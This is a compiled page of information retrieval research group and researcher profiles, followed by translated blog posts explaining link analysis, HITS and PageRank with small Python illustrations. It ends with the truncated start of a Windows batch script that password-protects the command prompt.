[www.cl.cam.ac.uk]

Research in NLIP has been done in the Computer Laboratory for nearly fifty years.
The earliest work, by Roger Needham and Karen Sparck Jones, was on automatic
thesaurus construction, in the context of document retrieval and machine translation.
Subsequent research by Karen Sparck Jones during the 1960s and 70s focused on
statistical approaches to retrieval and included innovative work on term
weighting. From the later 1970s research in language processing developed,
with work on syntax, semantics and discourse processing.

——
Karen Sparck Jones, [www.cl.cam.ac.uk]
Karen Sparck Jones has been one of the most influential figures in Computing
since the 1950’s. Her work on Information Retrieval and Natural Language Processing
has never been so central as it is today, with its implications for
search engine technology, the semantic web and even bioinformatics.

In 1972, Karen Sparck Jones published in the Journal of Documentation the paper
which defined the term weighting scheme now known as inverse document frequency (IDF).
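
For readers unfamiliar with the scheme, a common textbook form of IDF scores a term as log(N / df), where N is the number of documents and df is the number of documents containing the term. The sketch below assumes that form and a naive whitespace tokenizer; it is an illustration, not the exact formulation of the 1972 paper, and the sample documents are made up.

```python
import math
from collections import Counter


def inverse_document_frequency(documents: list) -> dict:
    """Map each term to log(N / df), where df counts documents containing it."""
    n_docs = len(documents)
    doc_freq = Counter()
    for doc in documents:
        # Use a set so a term counts once per document, however often it occurs.
        doc_freq.update(set(doc.lower().split()))
    return {term: math.log(n_docs / df) for term, df in doc_freq.items()}


if __name__ == "__main__":
    docs = [
        "information retrieval systems",
        "web information retrieval",
        "statistical term weighting",
    ]
    idf = inverse_document_frequency(docs)
    # "information" occurs in two of three documents, "weighting" in only one,
    # so "weighting" receives the higher weight.
    print(idf["information"], idf["weighting"])
```

The point of the weighting is visible in the output: terms that occur in fewer documents are treated as more discriminating.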

Karen Sparck Jones is emeritus Professor of Computers and Information at the
Computer Laboratory, University of Cambridge. She has worked in automatic
language and information processing research since the late fifties,
and has many publications including several books, most recently `Evaluating
Natural Language Processing Systems’ with Julia Galliers, and `Readings in
Information Retrieval’, edited with Peter Willett.

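Winner of the 1988 Salton Award. Another founder of the modern probabilistic IR model.
She has made notable contributions in NLP, IR, and related fields, and has done a great
deal of organizational work. She currently works at the Computer Laboratory, University
of Cambridge, UK.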

====================
LTI
CMU (Carnegie Mellon University) Language Technologies Institute,
[www.lti.cs.cmu.edu]

The Language Technologies Institute (LTI) of the School of Computer Science at
Carnegie Mellon University conducts research and provides graduate education
in all aspects of language technology and information management. The LTI was
established in 1996, as an expansion of the Center for Machine Translation
(CMT).

The Center for Machine Translation (CMT) was a research branch of the School
of Computer Science devoted to basic and applied research in all aspects of
natural language processing, with a primary focus on machine translation,
speech processing, and information retrieval. Containing a unique mix of
academic and industrial researchers specializing in various aspects of
computer science, artificial intelligence, computational linguistics and
theoretical linguistics, the CMT provided a rich and diverse environment for
collaboration among faculty, staff, visiting scholars, and qualified students.

——
Lemur Toolkit
Lemur is a collection of search engine algorithms and information retrieval
applications used for IR research, development and education. Lemur provides a
rich query language that supports search against simple texts, structured
(XML) texts, and texts annotated with part-of-speech, named-entity, and other
annotations used in NLP and text-mining applications. Lemur’s search engines
comfortably support collections ranging from a few gigabytes to a few
terabytes of text. The software is distributed under open-source license, and
is used widely in the IR research community.

====================
Stanford InfoLab
[infolab.stanford.edu]

The Stanford WebBase Project
[dbpubs.stanford.edu:8091]

The Stanford WebBase project is investigating various issues in crawling,
storage, indexing, and querying of large collections of Web pages. The project
builds on the previous Google activity that was part of the DLI1 initiative.
The DLI2 WebBase project aims to build the necessary infrastructure to
facilitate the development and testing of new algorithms for clustering,
searching, mining, and classification of Web content.
====================
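PKU Tianwang Group, [sewm.pku.edu.cn]

The Network Laboratory of Peking University has been doing research and system
development on search engines since 1997. It has deep technical experience, and its
overall strength and academic influence have consistently led the field in China.
The "Tianwang" search engine system we developed is the most influential campus-born
search engine in China and has run continuously since October 1997. Tianwang has
notable strengths in incremental search, fast retrieval, and massive information
storage. Its ongoing development has trained successive groups of students with
hands-on experience in processing massive volumes of web text, who are widely
welcomed by Chinese and foreign IT companies.
Since 2001, building on its search engine technology, the group has collected and
archived the history of information on the Chinese Internet, forming the "China
Internet Information Museum" (中国互联网信息博物馆). It has so far archived 2 billion
Chinese web pages that appeared at different times, making it the largest historical
web page archive and replay system in China. We have also tried multidisciplinary
research on top of it.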

====================
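CAS Large-Scale Content Computing Group
[159.226.40.18]

The information retrieval team studies the retrieval of text information. It has
taken part in TREC several times with very good results. The Tianluo (天罗) retrieval
system developed by the team is widely used in many important national information
departments. Current research directions include Web information acquisition and
Web information retrieval.
The information analysis team focuses on the analysis and mining of large-scale,
multi-source, heterogeneous information, including text classification and
clustering, information filtering, personalized services, natural language question
answering, and shallow natural language processing. The team has built a series of
experimental platforms for text processing, which can be tried through the
"成果演示" (demos) section of the home page. Also worth mentioning is the team's
open-source program; its high-performance word segmentation system ICTCLAS has been
widely recognized and used by researchers.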

====================
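Fudan University Information Retrieval and Natural Language Processing Group,
[www.cs.fudan.edu.cn]

The large-scale text processing work studies techniques and methods for processing
natural language, Chinese in particular. It covers two areas. The first is
foundational work, mainly basic theory and algorithms, including automatic word
segmentation, out-of-vocabulary word recognition, part-of-speech and concept
tagging, syntactic analysis, and semantic analysis, as well as collecting and
organizing corpora. The second is applied technology for Chinese information
processing, including automatic indexing, text retrieval, text summarization, text
classification, and text filtering, especially the use of these techniques in a
network environment. This second area is the research focus of the text direction.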

====================
HIT-IRLab, [ir.hit.edu.cn]

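The HIT Information Retrieval Lab (HIT-IRLab) was founded in March 2001. Its research
directions include text retrieval, question answering, automatic summarization, text
mining, and language analysis. The lab treats language analysis as its basic research
and text filtering as its applied research. It treats information extraction as the
extension of language analysis from sentence understanding to discourse
understanding, and sentence retrieval as an intelligent, precise retrieval technique
supported by language analysis and discourse understanding.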

====================
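SIGIR (ACM Special Interest Group on Information Retrieval)
TREC (Text REtrieval Conference)
MUC (Message Understanding Conference)
TIPSTER (IR practice base of the U.S. Defense Advanced Research Projects Agency)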

====================
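Institute of Computational Linguistics, Peking University
[icl.pku.edu.cn]

The Institute of Computational Linguistics at Peking University was founded in 1986.
It works in three areas: computational linguistics theory, foundational resources
for language information processing, and applied technology.
Its work on computational linguistics and natural language processing covers three
main directions. The first is research on and construction of foundational
resources: computational lexicography and machine dictionaries, comprehensive
language knowledge bases, corpus linguistics and corpus processing technology, and
terminology, automatic term extraction, and term standardization. The second is
basic theory and NLP models and methods: foundations of computational linguistics,
core NLP technology, modern Chinese grammar, lexical, syntactic, and semantic
analysis of Chinese, statistical NLP models, and information-theoretic methods for
language processing. The third is applied technology: methods, techniques, and
system implementation for machine translation, information retrieval and
extraction, evaluation methods and techniques for natural language processing
systems, controlled Chinese and its writing-assistance systems, and computer-aided
research on classical Chinese poetry.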

====================
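#State Key Laboratory of Intelligent Technology and Systems, Tsinghua University (URL could not be reached)
#[www.csai.tsinghua.edu.cn]

The State Key Laboratory of Intelligent Technology and Systems is hosted by Tsinghua
University. It opened to outside researchers in February 1990. It mainly does basic
and applied basic research on the fundamental principles and methods of artificial
intelligence, including intelligent information processing, machine learning,
intelligent control, and neural network theory. It also studies AI-related applied
technology and system integration, mainly intelligent robots and the processing of
sound, graphics, images, text, and language.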

================
Susan Dumais,
[research.microsoft.com]

I am interested in algorithms and interfaces for improved information
retrieval, as well as general issues in human-computer interaction. I
joined Microsoft Research in July 1997. I work on a wide variety of
information access and management issues, including: personal information
management, web search, question answering, information retrieval, text
categorization, collaborative filtering, interfaces for improved search and
navigation, and user/task modeling.

Prior to coming to Microsoft, I worked on a statistical method for
concept-based retrieval known as Latent Semantic Indexing. You can find
pointers to this work on the Bellcore (now Telcordia) LSI page.

===============
UIUC Information Retrieval Group
[sifaka.cs.uiuc.edu]

The Information Retrieval (IR) group is part of the Database and Information
Systems (DAIS) Lab of the Computer Science Department at University of
Illinois at Urbana-Champaign. We work on a wide spectrum of problems in the
general area of text information management, including retrieval,
organization, filtering , and mining of textual information, aiming at
developing advanced text information management techniques and systems that
help people make better use of text information.

——
ChengXiang Zhai,
[www-faculty.cs.uiuc.edu]

Research Interests: Information Retrieval, Text Mining, Natural Language
Processing, Bioinformatics

ChengXiang Zhai, University of Illinois at Urbana-Champaign, is recognized for
his work on user-centered, adaptive intelligent information access. His
techniques are expected to improve search-engine performance, support better
information organization and enable understanding of large volumes of
information. Zhai's work in information retrieval is expected to enhance
curricula and provide new educational tools for the growing information
technology workforce.

===============
Stephen Robertson,
[research.microsoft.com]

Stephen Robertson joined Microsoft Research Cambridge in April 1998.

In 1998, he was awarded the Tony Kent STRIX award by the Institute of
Information Scientists. In 2000, he was awarded the Salton Award by ACM SIGIR.
He is a Fellow of Girton College, Cambridge.

At Microsoft, he runs a group called Information Retrieval and Analysis, which
is concerned with core search processes such as term weighting, document
scoring and ranking algorithms, and combination of evidence from different
sources. These are studied theoretically through the use of formal models,
mainly statistical, and statistical methods including machine learning
methods, and experimentally, through activities such as the Text Retrieval
Conference (TREC) and with internally generated evaluation sets. The group
(with its Keenbow evaluation environment) has had some excellent results at
TREC. The group works closely with product groups to transfer ideas and
techniques.

His main research interests are in the design and evaluation of retrieval
systems. He is the author, jointly with Karen Sparck Jones, of a probabilistic
theory of information retrieval, which has been moderately influential. A
further development of that model, with Stephen Walker, led to the term
weighting and document ranking function known as Okapi BM25, which is used in
many experimental text retrieval systems.

Prior to joining Microsoft, he was at City University London, where he retains
a part-time position as Professor of Information Systems in the Department of
Information Science (homepage). He was Head of Department for eight years,
during which time it achieved the highest possible rating in two successive
research assessment exercises. He also started the Centre for Interactive
Systems Research, the main research vehicle of which is the Okapi text
retrieval system, which has also done well at TREC.

Before joining City, he was a research fellow at University College London,
where he took his PhD in the School of Library Archive and Information
Studies. Before that he was in the research department at Aslib. He has an MSc
in Information Science from City and a first degree in mathematics from
Cambridge.

===================
Nick Craswell
[research.microsoft.com]

I am an associate researcher at Microsoft Research Cambridge, in the
Information Retrieval and Analysis Group.

Research Overview

I am interested in Web search evaluation, mostly on enterprise-scale webs but
also the World Wide Web. I built the VLC, VLC2, WT2g and .GOV test
collections, which have been made available to research groups around the
world. David Hawking and I coordinated the TREC Web Track experiments. I am
currently involved in the TREC Terabyte Track and Enterprise Track. Some
publications: Book chapter preprint (pdf), IR’01 (citeseer) and CSIRO’01
(pdf).

I also work on effective Web search, which means making use of information in
pages, link structure and URL structure to generate more useful Web search
results. Some papers: SIGIR’05 (pdf), SIGIR’01 (pdf), TOIS’03 (pdf) (copying
is by permission of ACM, Inc.) and ADCS’03 (pdf).

My PhD was in distributed information retrieval (thesis pdf) which means
building a system on top of multiple engines/databases that already exist. My
recent work in the area has considered whether (or when) DIR is really
practical. Some papers: ADC’99 (ps), DL’00 (pdf), ADC’03 (pdf) and ADC’04
(pdf).

===============
Web Search & Data Mining Group of MSR Asia
[research.microsoft.com]

The goal of the Web Search & Data Mining Group of MSR Asia is to drive the
next generation of Web search by leveraging data mining, machine learning, and
knowledge discovery techniques for information analysis, organization,
retrieval, and visualization. In addition, in contrast with current Web search
methods, which essentially do document-level ranking and retrieval, the Web
Search & Data Mining Group has created search at the object level to bring
increased knowledge and intelligence to users.

A Glimpse at Several Core Innovations:

Large-scale Experimental Web Search Platform

The Web Search & Data Mining Group is creating a large scale search platform
to efficiently store, parse, index and search billions of Web pages and other
types of documents. The search platform is flexible enough to allow for
testing of various state-of-the-art search techniques that have been created
at the lab using new technologies.

Structuralizing the Web

The biggest challenge facing both users and search engines over the next
several decades is the continued unstructured growth of the Internet. As such,
search functions that can effectively and efficiently dig out
machine-understandable information and knowledge layers from unorganized and
unstructured Web data will be the key to supporting relevant search results.
To meet this challenge, the group is exploring technologies, namely Web
information extraction, deep Web mining, and Web structure mining that can
automatically classify structures and extract objects from the Web. The
information and knowledge gathered using these new techniques greatly improves
the performance of current Web search and even facilitates the creation of
more sophisticated next generation search technologies.

Vertical Search

Today’s conventional search engines can be described as page-level search
engines whose main function is to rank web pages according to their relevance
to a given query. Driving the future of the search industry are functions that
delve deeper into vertical domains to provide knowledge and intelligence to
query results. At MSR Asia, the Web Search & Data Mining Group is addressing
the greatest challenges faced by vertical search including large scale web
classification, object-level information extraction, object identification and
integration, and object relationship mining and ranking. The results of these
efforts are leading to more advanced search engines that deliver intelligence
and insight to search results.

Mobile Search

The explosive growth of new computing devices such as handheld computers,
Windows Mobile-based PocketPCs, and SmartPhones is driving demand for greater
and more efficient information access. These devices, which leverage the power
of the Web and allow greater access to information than ever before, are still
not capable of performing at the level of a desktop PC. At MSR Asia, the Web
Search & Data Mining Group is inventing new technologies to improve the mobile
search and browsing experience and deliver the capabilities of a PC to users
of these new devices. Project initiatives include developing innovative
presentation schemes and user interfaces to facilitate search and browsing
tasks on mobile devices and developing context aware search technologies to
address the special information needs of mobile users.

Multimedia Search

The Web Search & Data Mining Group is conducting research into new
technologies that index multimedia content such as images, videos, and audio.
Through content analysis and advanced visualization techniques, the group is
transforming today’s conventional text based search engines to include
multimedia content thus delivering more intelligent search results to users.
For example, the group recently developed a new multimedia news reader which
mines large archival news databases presenting text, map information, images,
and background music within a unique user interface providing readers with a
more efficient news search engine and a more enjoyable reading experience.

——
Wei-Ying Ma
[research.microsoft.com]

Senior Researcher, Research Manager, Microsoft Research Asia

Dr. Wei-Ying Ma received the B.S. degree in electrical engineering from the
National Tsing Hua University in Taiwan in 1990, and the M.S. and Ph.D.
degrees in electrical and computer engineering from the University of
California at Santa Barbara in 1994 and 1997, respectively. From 1994 to 1997
he was engaged in the Alexandria Digital Library (ADL) project in UCSB while
completing his Ph.D. He developed a web-based image retrieval system called
Netra which has been frequently cited by other researchers and is regarded as
one of the most representative image retrieval systems. From 1997 to 2001, he
was with HP Labs where he worked in the field of multimedia adaptation and
distributed media services infrastructure. He joined Microsoft Research Asia
in 2001. Since then, he has been leading a research group to conduct research
in the areas of information retrieval, web search, data mining, mobile
browsing, and multimedia management. He currently serves as an Editor for the
ACM/Springer Multimedia Systems Journal and Associate Editor for ACM
Transactions on Information Systems (TOIS). He has served on the organizing and
program committees of many international conferences including ACM Multimedia,
ACM SIGIR, ACM CIKM, WWW, ICME, CVPR, SPIE Multimedia Storage and Archiving
Systems, SPIE Multimedia Communication and Networking, etc. He is also the
general co-chair of International Multimedia Modeling (MMM) Conference 2005
and International Conference on Image and Video Retrieval (CIVR) 2005. He has
published 5 book chapters and over 100 international journal and conference
papers.

====================
Google Labs
[labs.google.com]

Google Labs is a playground for Google engineers and adventurous Google users.
Google staffers with wild and crazy ideas post their prototypes on Google Labs
and solicit feedback on how the technology could be used or improved. None of
these experiments are guaranteed to make it onto Google.com, as this is really
the first phase in the development process. Google users with a desire to jump
over the cutting edge are invited to check out any or all of the posted
prototypes and send their comments directly to the Googlers who developed
them. Please, remember to wear your safety goggles while using this site.

Labs.google.com, Google’s technology playground.
Google labs showcases a few of our favorite ideas that aren’t quite ready for
prime time. Your feedback can help us improve them. Please play with these
prototypes and send your comments directly to the Googlers who developed them.

Want to learn more about Google technology? Here are some papers.
[labs.google.com]

Passionate about these topics? You should work at Google.
algorithms, artificial intelligence, compiler optimization,
computer architecture, computer graphics,
data compression, data mining, file system design,
genetic algorithms, information retrieval,
machine learning, natural language processing, operating systems,
profiling, robotics,
text processing, user interface design,
web information retrieval, and more!

[www.google.com]
Google Press Center: The Google Podium
Here you’ll find a selection of public presentations made by Google
executives. From time to time, we will continue to add transcripts, audio or
video clips and links to presentations hosted elsewhere.

====================
Jon Kleinberg
[www.cs.cornell.edu]

Professor of Computer Science, Cornell University

My research is concerned with algorithms that exploit the combinatorial
structure of networks and information. My recent work has included
* link analysis and modeling of the World Wide Web and related information networks;
* discrete optimization and network algorithms; and
* algorithmic approaches to clustering, indexing, and data mining.
====================

02 2007

[Search Engine Technology Primer - 4] Link Structure Analysis Techniques in Search Engine Systems (Part 3)

Posted by Yangybcy in Resources

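Today we give the last lecture in the link analysis series. The PageRank algorithm introduced here is a link analysis algorithm that Brin and others at Google built on a model of how Internet users browse.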

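PageRank's basic architecture and implementation approach have been hugely successful in commercial search engines, which in turn drew broad attention from the research community. Efforts to improve the algorithm's effectiveness and efficiency have remained a focus of link analysis research up to the present.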

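PageRank simplifies the browsing model in a reasonable way. Assume a Web surfer who starts from a randomly chosen page and moves forward by following the links on each page. On every page, the surfer may lose interest in that page's links and instead pick a new page at random to start browsing afresh.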

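Under this browsing model, the probability that a page is visited is reflected in the size of its Rank value. As shown in the figure below, page q1 contains links to pages p and m, so it contributes half of its own Rank value to each of p and m.

[Figure: page q1 links to pages p and m]

Formally, in PageRank the probability that page P is visited is given by the following formula:

[Formula image: Rank(P)]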
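
The formula image is not preserved here. A commonly cited form of the PageRank recurrence, which agrees with the q1 example above and uses the symbols sigma and d explained in the next paragraph, can be written as follows. The out-link count C(q) is notation assumed for this sketch, d is read as the probability that the surfer keeps following links, and the exact expression in the original figure may differ (for instance in how the constant term is normalized).

```latex
\mathrm{Rank}(P) = (1 - d) + d \sum_{q \in \sigma} \frac{\mathrm{Rank}(q)}{C(q)}
```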

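Here sigma is the set of pages that link to page P, and d is the importance factor of page P, obtained from prior knowledge, which reflects how useful users consider this page to be. Put simply, it captures whether the user will abandon this page and start a new random browsing process. In the algorithm, the computation above is repeated until the results converge, and the resulting Rank(P) is used as a measure of page quality.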
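
The repeat-until-convergence computation can be sketched in a few lines of Python. This is a minimal illustration, not Google's implementation: the function name `pagerank`, the value d=0.85, the tolerance, and the back links from p and m to q1 in the toy graph are all assumptions made for the example.

```python
def pagerank(links, d=0.85, tol=1e-9, max_iter=200):
    """Iterate Rank(P) = (1 - d) + d * sum(Rank(q) / outdegree(q)) until stable.

    links maps each page to the list of pages it links to. d=0.85 is an
    assumed, commonly used value; the article does not give one.
    """
    pages = set(links) | {t for targets in links.values() for t in targets}
    rank = {p: 1.0 for p in pages}
    for _ in range(max_iter):
        new_rank = {p: 1.0 - d for p in pages}
        for q, targets in links.items():
            if not targets:
                continue  # pages without out-links pass nothing on in this sketch
            share = d * rank[q] / len(targets)  # q splits its rank evenly
            for t in targets:
                new_rank[t] += share
        delta = max(abs(new_rank[p] - rank[p]) for p in pages)
        rank = new_rank
        if delta < tol:
            break
    return rank


# Toy graph: q1 links to p and m (as in the text); p and m link back (assumed).
toy = {"q1": ["p", "m"], "p": ["q1"], "m": ["q1"]}
ranks = pagerank(toy)
```

In this toy graph p and m receive equal scores, because q1 divides its contribution evenly between them.
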
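PageRank is widely promoted as one of the main reasons for Google's success, but at the level of academic research it has not been as successful as one might expect.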

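Nick Craswell and David Hawking found that even on the home page finding task, where link analysis methods are used most, PageRank and its variants achieved results only slightly better than pure content retrieval. According to experiments by Liu Yue (刘悦) et al., results with PageRank on large-scale TREC retrieval data were "roughly on par with the baseline data". Amento et al. also verified experimentally that, at least on small-scale data, link structure analysis algorithms including PageRank and HITS cannot effectively improve on plain text retrieval.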

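We believe that the reason so many link analysis algorithms, PageRank and HITS among them, fail in Web information retrieval research lies in the incompleteness of the data sets that such research typically uses. Even the .GOV collection, a relatively large one now in fairly wide use, covers less than 20 GB of data, and its link table contains fewer than 1.5 million links. With so much of the link structure missing, relying on link structure analysis alone to assess page quality is unreliable. This also explains why link analysis modules remain an indispensable part of commercial search engines even though researchers keep reporting that link analysis does not help retrieval performance.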

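In a real Web environment, however, link analysis faces new problems: the data is messy, and spam and manipulative links exist. From this perspective, whether in experiments or in production, link analysis is one viable approach, but not the whole solution, to problems facing Web information retrieval such as page quality assessment.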

02 2007

[Search Engine Technology Primer - 3] Link Structure Analysis Techniques in Search Engine Systems (Part 2)

Posted by Yangybcy in Resources

This time we introduce HITS, a link analysis algorithm used in search engines.

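HITS is a link analysis algorithm proposed by Kleinberg in the late 1990s. Unlike practical algorithms such as PageRank, which we introduce later, HITS is to a larger extent an experimental attempt. It has to run after the retrieval system has performed content-based retrieval, and it computes over the link relations among the retrieved result pages and the pages directly connected to them. This makes HITS very hard to use in production. Some have tried algorithmic improvements and dedicated link structure servers (Connectivity Server) to achieve a degree of online real-time computation, but for a commercial search engine that handles more than several billion user requests every day, the computational cost is still unacceptable.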

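Even so, HITS has received a great deal of attention in both academia and industry. IBM even developed a dedicated retrieval application, the Clever system, based on an improved HITS (although the system was never deployed as a real Web search service). This attention stems partly from the mathematical rigor of the HITS design. More importantly, the design matches the common criteria by which Web users judge the quality of Web resources, so it can make it easier for users to reach Internet resources through retrieval tools.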

The result of HITS's quality assessment is expressed as two scores assigned to each page: content authority (Authority) and link authority (Hub).

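Content authority relates to the quality of the content a page provides directly: the more pages cite a page, the higher its content authority. Correspondingly, link authority relates to the quality of the hyperlinks a page provides: the more high-quality content pages a page cites, the higher its link authority. If a page with high content authority is like a restaurant with good food, then a page with high link authority is like an article in a travel magazine in which a food critic recommends places to eat.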

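Because the data that Web information retrieval deals with, the World Wide Web, is vast and messy, most query topics return a large number of relevant results. Faced with thousands or tens of thousands of relevant results, most users want to find the pages in the result set that are most valuable for their information need. HITS addresses exactly this problem: the data set it operates on is the set of results that the retrieval tool returns for the query topic, and its output is an assessment of the content authority and link authority of the pages in that set. HITS is therefore regarded as capable of greatly improving the user's search experience, and it has attracted the attention of many researchers.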

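In terms of concrete steps, HITS is an "iterate until convergence" process. Because the detailed procedure is fairly involved, we do not describe it in full and only note the following: the link authority of page A is determined by the content authority of the pages it links to, while the content authority of page A is determined by the link authority of the pages that link to it. Does this sound a bit like the chicken and the egg?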
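
The mutual definition of the two scores can be made concrete with a short Python sketch. It is a simplified illustration under stated assumptions, not Kleinberg's full procedure: the function names, the fixed iteration count, the L2 normalization, and the toy graph are all choices made for this example, and the step of building the graph from query results is left out.

```python
import math


def hits(links, iterations=50):
    """Return (authority, hub) scores for a small link graph.

    links maps each page to the pages it links to. The fixed iteration count
    and the L2 normalization are choices made for this sketch.
    """
    pages = set(links) | {t for targets in links.values() for t in targets}
    auth = {p: 1.0 for p in pages}
    hub = {p: 1.0 for p in pages}
    for _ in range(iterations):
        # Authority of a page: sum of hub scores of the pages linking to it.
        new_auth = {p: 0.0 for p in pages}
        for src, targets in links.items():
            for dst in targets:
                new_auth[dst] += hub[src]
        # Hub of a page: sum of authority scores of the pages it links to.
        new_hub = {p: sum(new_auth[dst] for dst in links.get(p, [])) for p in pages}
        auth = _normalize(new_auth)
        hub = _normalize(new_hub)
    return auth, hub


def _normalize(scores):
    """Scale scores to unit L2 length so they do not grow without bound."""
    norm = math.sqrt(sum(v * v for v in scores.values())) or 1.0
    return {p: v / norm for p, v in scores.items()}


# Two "guide" pages recommend restaurants; r1 is recommended by both.
graph = {"guide1": ["r1", "r2"], "guide2": ["r1"], "r1": [], "r2": []}
authority, hub_score = hits(graph)
```

In the toy graph, r1 ends up with the higher authority score because both guides point to it, and guide1 ends up as the stronger hub because it points to more authoritative pages.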

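HITS has had some success in specific settings. For example, in a small-scale experiment by Chakrabarti et al. based on HITS, the researchers obtained retrieval performance exceeding that of the hand-built classifications of Yahoo! and AltaVista. However, the experimental data was small, and the labeling of the test set lacked sufficient objectivity.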

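The kind of data HITS operates on and the iterative nature of the algorithm mean that it cannot be applied at large scale in Web information retrieval systems. Moreover, further experiments on real Web data show that the algorithm itself is not particularly effective at picking out pages with high content or link quality. The main reasons include:
A. Pages within the same site mutually reinforce each other's authority scores;
B. Links generated automatically by Web authoring tools interfere with the results;
C. Off-topic pages, or topic drift.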

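To address these shortcomings, Bharat et al. modified HITS, for example by ignoring links within a site, or by using the content similarity of pages to initialize the Hub/Authority values. These improvements had limited success, but their core idea does not differ substantially from HITS, so we do not discuss them further here.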
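
The first of these modifications, ignoring links within a site, can be sketched as a filter applied to the link list before HITS runs. Treating a "site" as the URL host name is an assumption made here; the article does not say how Bharat et al. define a site, and the function name and example URLs are hypothetical.

```python
from urllib.parse import urlsplit


def drop_intra_site_links(edges):
    """Keep only links whose source and destination are on different hosts."""
    kept = []
    for src, dst in edges:
        if urlsplit(src).hostname != urlsplit(dst).hostname:
            kept.append((src, dst))
    return kept


edges = [
    ("http://a.example/index.html", "http://a.example/about.html"),  # same site
    ("http://a.example/index.html", "http://b.example/"),
    ("http://b.example/", "http://a.example/index.html"),
]
cross_site = drop_intra_site_links(edges)
```

Only the two cross-site links survive, so pages of one site can no longer boost each other's scores (reason A above).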

02 2007

[Search Engine Technology Primer - 2] Link Structure Analysis Techniques in Search Engine Systems (Part 1)

Posted by Yangybcy in Resources

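For the second installment of this series on search engine technology, we look at link structure analysis. Hyperlink structure is one of the biggest differences between the Web and traditional information media. Link structure, which is relatively independent of both the user's query and the page content, is at the core of what distinguishes search engines from traditional information retrieval systems.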

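If Web information resources are an all-encompassing encyclopedia, then link structure is its table of contents. Without link structure as an organizing medium, the seemingly disordered mass of Web information would be hard for users to exploit fully.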

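Ever since Google published parts of its PageRank algorithm in academic papers in 1998, the enthusiasm of researchers, industry, and search engine hobbyists for link analysis has never waned. Before describing the algorithms in detail, we first take a different angle and introduce the basic assumptions on which link analysis rests.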

1. What is a hyperlink

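A hyperlink is a pointing relation between two Web pages, or between two different parts of one page. The source page is the page that contains the hyperlink. In the HTML source of the source page, a hyperlink generally appears in the following text form:
<A HREF="http://www.tsinghua.edu.cn/">清华大学主页</A>
The destination page is the page that the hyperlink references. The text that describes the link and is visible to users in the source page is called the "anchor text" (in the example above, the anchor text is "清华大学主页", that is, "Tsinghua University home page"). The special color and underline of the anchor text indicate that it is a clickable hyperlink. All page quality assessment algorithms based on hyperlink structure analysis revolve around the use of the link graph and the anchor text.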
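
To show how a program obtains the destination URL and the anchor text from such markup, here is a minimal sketch that uses Python's standard `html.parser` module. The class name `LinkExtractor` is hypothetical, and the sketch does not handle nested links or relative URLs.

```python
from html.parser import HTMLParser


class LinkExtractor(HTMLParser):
    """Collect (destination URL, anchor text) pairs from an HTML string."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <A HREF=...> matches.
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        # Text is collected only while inside an <a> element that has an href.
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


parser = LinkExtractor()
parser.feed('<A HREF="http://www.tsinghua.edu.cn/">清华大学主页</A>')
print(parser.links)
```

Each pair gives one edge of the link graph (source page to destination URL) together with the anchor text that describes the destination.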

2. Basic assumptions of hyperlink structure analysis

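At the SIGIR conference in 2001 (the annual conference held by the US-based Association for Computing Machinery, ACM, and the most authoritative international research conference on information retrieval), Craswell et al. of Australia's Commonwealth Scientific and Industrial Research Organisation (CSIRO) analyzed how link structure analysis algorithms are applied. They proposed that the following two properties of hyperlink structure, stated as assumptions, are in fact the foundation on which the various hyperlink algorithms rest: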

If a hyperlink L points from page Psource to page Pdestiny, then Psource and Pdestiny satisfy:

Assumption 1 (content recommendation): the author of page Psource recommends the content of page Pdestiny and uses the anchor text of L to describe Pdestiny.

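Assumption 2 (topic relatedness): two pages Psource and Pdestiny connected by a hyperlink are more likely to be related in content than two pages drawn at random.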

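It follows from Assumption 1 that a page with more in-links is recommended more strongly and should receive a higher score in page quality assessment. Experiments on smaller Web corpora show that algorithms built on this assumption can effectively pick out high-quality pages. For the same reason, in the real Web, adding more in-links to a page has become one of the main ways of cheating to raise its ranking in search engines. Assumption 1 also points to an important property of anchor text: it is a relatively objective description of the destination page's content. Many studies have shown that algorithms exploiting this property are an effective means of improving Web retrieval quality.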
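
The simplest scoring rule that follows from Assumption 1 is to count in-links. The sketch below is only an illustration; the function name, the decision to count duplicate links once, and the toy edge list are assumptions made for the example.

```python
from collections import Counter


def inlink_counts(edges):
    """Count in-links per destination page from (source, destination) pairs."""
    # Duplicate links between the same pair are counted once (a sketch choice).
    return Counter(dst for _, dst in set(edges))


edges = [("a", "c"), ("b", "c"), ("a", "b"), ("a", "c")]
counts = inlink_counts(edges)
ranked = [page for page, _ in counts.most_common()]
```

Page c is linked from both a and b, so it ranks first. The same rule also shows why link spam works: every extra in-link raises the count, whoever created it.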

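The validity of Assumption 2 has been confirmed by a number of studies. It is also the theoretical basis for some algorithms that combine content analysis with link analysis, such as the spreading activation (SA) algorithm. Using this assumption, a retrieval algorithm has reason to treat pages that are close, in link terms, to relevant pages as fairly relevant too. It also gives many duplicate/redundant page detection algorithms a useful avenue of analysis beyond page content.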
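
One simple way to act on Assumption 2 is to pass a fraction of each page's content score to the pages it is linked with. The sketch below shows a single propagation step only; it is not the SA algorithm from the literature, and the function name, the weight of 0.5, and the treatment of links as undirected are assumptions made for illustration.

```python
def spread_scores(content_scores, edges, weight=0.5):
    """Add a fraction of each page's content score to the pages it is linked with."""
    combined = dict(content_scores)
    for src, dst in edges:
        # Treat the link as undirected: relatedness is assumed to go both ways.
        combined[dst] = combined.get(dst, 0.0) + weight * content_scores.get(src, 0.0)
        combined[src] = combined.get(src, 0.0) + weight * content_scores.get(dst, 0.0)
    return combined


scores = {"a": 1.0, "b": 0.0, "c": 0.0}
result = spread_scores(scores, [("a", "b")])
```

Page b has no content match of its own but is linked with the relevant page a, so it gains some score, while the unconnected page c stays at zero.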

24 2007

Recommended: password-protect CMD so that even an overflow exploit on the machine cannot obtain CMD access

Posted by Yangybcy in Resources

The following is the lock.bat file


@echo off
rem Password gate for cmd.exe. The log and message paths under e:\CMD are hard-coded.
title Password check
SETLOCAL
set pwd=0
set times=3

echo ________________________________________________________________________________
echo  You are using [Angle]'s CMD. No command may be run without [Angle]'s permission.
echo  All actions and messages in this session are logged. If you do not have a
echo  password, contact [Angle]. If you already have one, enter it now!
echo ________________________________________________________________________________
echo ####################################################################### >> e:\CMD\mylog.txt
echo  Action: password check started      Time:%time%    Date:%date% >> e:\CMD\mylog.txt
echo  Status: waiting for verification... >> e:\CMD\mylog.txt
echo. >> e:\CMD\mylog.txt
echo                                 [ LOGIN ]

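:password
set /p pwd= Enter your password:
set /A times=%times%-1
rem Quote both sides so that input containing spaces does not break the comparison.
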